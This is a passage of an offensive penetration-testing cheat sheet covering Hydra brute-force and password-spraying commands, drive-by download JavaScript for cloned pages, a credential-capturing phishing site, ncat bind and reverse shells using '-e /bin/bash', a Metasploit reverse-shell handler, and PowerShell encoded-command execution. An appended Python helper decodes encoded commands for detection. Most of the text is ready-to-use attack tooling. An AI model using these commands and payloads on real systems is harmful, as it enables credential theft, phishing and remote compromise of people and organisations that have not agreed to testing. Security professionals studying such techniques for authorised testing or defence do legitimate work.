-l Login with a login name
-L Load several logins from a file
-p Login with a password
-P Load several passwords from a file
-x Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help
-y Disable use of symbols in bruteforce
-e Try "n" null password, "s" login as pass and/or "r" reversed login
-M List of servers to attack, one entry per line, ':' to specify port
-f/-F Exit when a login/pass pair is found (-f per host, -F global)
-o Write found login/password pairs to a file instead of stdout
-O Use old SSL v2 and v3

For more options run man hydra or hydra -h.

Supported Services
ftp[s]
http[s]-{get|post}-form
mysql
smb
smtp[s]
snmp
ssh
telnet[s]
vnc

For more supported services read the manual.

Brute Force Syntax Description
MIN Minimum number of characters in the password
MAX Maximum number of characters in the password
CHARSET Charset values are: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and for all others, just add their real representation

Brute force attack:

hydra -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp -o hydra_results.txt

Password Spraying

After you have collected enough usernames from the reconnaissance phase, it is time to try and crack some of them.

Find out how to generate a good password spraying wordlist from my other project, but first you will need a few good keywords that describe your target.

Such keywords can be a company name and abbreviation or keywords that describe your target's services, products, etc.

After you generate the wordlist, use it with tools such as Hydra or Burp Suite Intruder to crack web login forms. P.S. Hydra can attack authentication mechanisms on all kinds of services/ports.

If a strong password policy is enforced, passwords usually consist of one capitalized word followed by a few digits and one special character at the end (e.g. Password123!).

You can also use the generated wordlist with hashcat, e.g. to crack NTLMv2 hashes that you have collected using an LLMNR responder, etc.

5. Social Engineering

Find out how to embed a PowerShell script into an MS Word document from my other project.

Drive-by Download

To force users to download a malicious file, copy and paste this JavaScript code block on the cloned web page:

function download(url, type, name, method = 'GET') {
	var req = new XMLHttpRequest();
	req.open(method, url, true);
	req.responseType = 'blob';
	req.onload = function() {
		var blob = new Blob([req.response], { type: type });
		// document.documentMode only exists in Internet Explorer
		var isIE = !!document.documentMode;
		if (isIE) {
			// IE doesn't allow using a blob object directly as a link,
			// instead it is necessary to use msSaveOrOpenBlob()
			if (window.navigator && window.navigator.msSaveOrOpenBlob) {
				window.navigator.msSaveOrOpenBlob(blob, name);
			}
		} else {
			// other browsers: create a temporary anchor with a download attribute and click it
			var anchor = document.createElement('a');
			anchor.href = window.URL.createObjectURL(blob);
			anchor.download = name;
			document.body.appendChild(anchor);
			anchor.click();
			// in Firefox it is necessary to delay revoking the object URL;
			// revokeObjectURL() takes the URL string (anchor.href), not the element
			setTimeout(function() {
				window.URL.revokeObjectURL(anchor.href);
				anchor.remove();
			}, 250);
		}
	};
	req.send();
}
// specify your file here, use only an absolute URL
download('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf');
// download('http://localhost/files/pentest.docx', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'pentest.docx');

To try it out, copy all the content from \social_engineering\driveby_download\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the website with your preferred web browser.

Phishing Website

To try it out, copy all the content from \social_engineering\phishing_website\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the website with your preferred web browser.

Captured credentials will be stored in \social_engineering\phishing_website\logs\credentials.log.

Figure 2 - Phishing Website
Read the comments in \social_engineering\phishing_website\index.php to get a better understanding on how all of it works.

You can modify and expand this template to your liking. You have everything you need to get started.

You can easily customize the CSS to make it look more like the company you are testing, e.g. change colors, logo, etc.

Check the standalone redirect templates in \social_engineering\phishing_website\redirects\ directory.

6. Miscellaneous

Here you can find a bunch of random stuff.

6.1 Useful Websites

archive.org

isithacked.com

haveibeenpwned.com

search.wikileaks.org

jsonlint.com

www.base64decode.org

www.urldecoder.org

raikia.com/tool-powershell-encoder

bitly.com

www.getcreditcardnumbers.com

cURL

Download a file:

curl somesite.com/somefile.txt --output somefile.txt

Test a server for various HTTP methods:

curl -v -X TRACE somesite.com

curl -v -X DEBUG somesite.com --insecure

curl -v -X OPTIONS somesite.com --include

curl -v somesite.com --upload-file somefile.txt

For more options run man curl or curl -h.

Ncat

[Server] Set up a listener:

ncat -nvlp 9000

ncat -nvlp 9000 > received_data.txt

ncat -nvlp 9000 -e /bin/bash

ncat -nvlp 9000 -e /bin/bash --ssl

ncat -nvlp 9000 --ssl-cert "sws_crt.pem" --ssl-key "sws_key.pem"

ncat -nvlp 9000 --keep-open <<< $'HTTP/1.1 200 OK\r\n\r\n'

[Client] Connect to a remote host:

ncat -nv 192.168.8.5 9000

ncat -nv 192.168.8.5 9000 < sent_data.txt

ncat -nv 192.168.8.5 9000 -e /bin/bash

ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl

ncat -nv 192.168.8.5 9000 --ssl-cert "sws_crt.pem" --ssl-key "sws_key.pem"

Check if it is possible to connect to a specific TCP port (e.g. port 22 or 23):

for i in {0..255}; do ncat -nv 192.168.5.$i 9000 -w 2 -z 2>&1 | grep -P -o "(?<=Connected\ to\ )[^\s]+(?=\.)"; done

for ip in $(cat ips.txt); do ncat -nv $ip 9000 -w 2 -z 2>&1 | grep -P -o "(?<=Connected\ to\ )[^\s]+(?=\.)"; done

For more options run man ncat or ncat -h.

Find out how to create an SSL/TLS certificate from my other project.

multi/handler

Set up a multi/handler module (change the PAYLOAD, LHOST and LPORT as needed):

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 127.0.0.1

set LPORT 9000

exploit

ngrok

Use ngrok to give your local web server a public address (if needed), but do not leave the web server exposed for longer than necessary if it is not properly hardened.

I would also advise you not to transfer any sensitive data over it, just in case.

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))
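Added example (not part of the original cheat sheet): the same UTF-16LE + Base64 transform as the two PowerShell one-liners above, written in Python so the encoded payload can be recovered from a logged process command line; the helper recognizes the shortened forms of the switch (-e, -en, -enc, ...) that powershell.exe accepts, and the log line formats mentioned in the comments are assumptions.

```python
import base64

# powershell.exe accepts any prefix of the parameter name that starts with "e"
# (-e, -en, -enc, -EncodedCommand), so a detection must not look only for the full spelling.
_PARAM = "encodedcommand"


def encode_command(script: str) -> str:
    """Same transform as [Text.Encoding]::Unicode.GetBytes + [Convert]::ToBase64String."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse transform; raises on anything that is not Base64 of UTF-16LE text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def extract_encoded_commands(cmdline: str) -> list:
    """Return the decoded payload of every -EncodedCommand style argument found in a
    process command line (e.g. the CommandLine field of Sysmon event 1 or Windows event 4688)."""
    tokens = cmdline.split()
    found = []
    for flag, value in zip(tokens, tokens[1:]):
        if flag[:1] not in ("-", "/"):
            continue
        name = flag[1:].lower()
        if not name or not _PARAM.startswith(name):
            continue
        try:
            found.append(decode_command(value))
        except (ValueError, UnicodeDecodeError):
            pass  # the flag was not followed by a valid UTF-16LE/Base64 blob
    return found


if __name__ == "__main__":
    # constructed sample: the cheat sheet's invocation with a harmless encoded script
    blob = encode_command("Write-Host 'hi'")
    sample = "PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand " + blob
    print(extract_encoded_commands(sample))
```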

Find out more about PowerShell reverse and bind TCP shells from my other project.
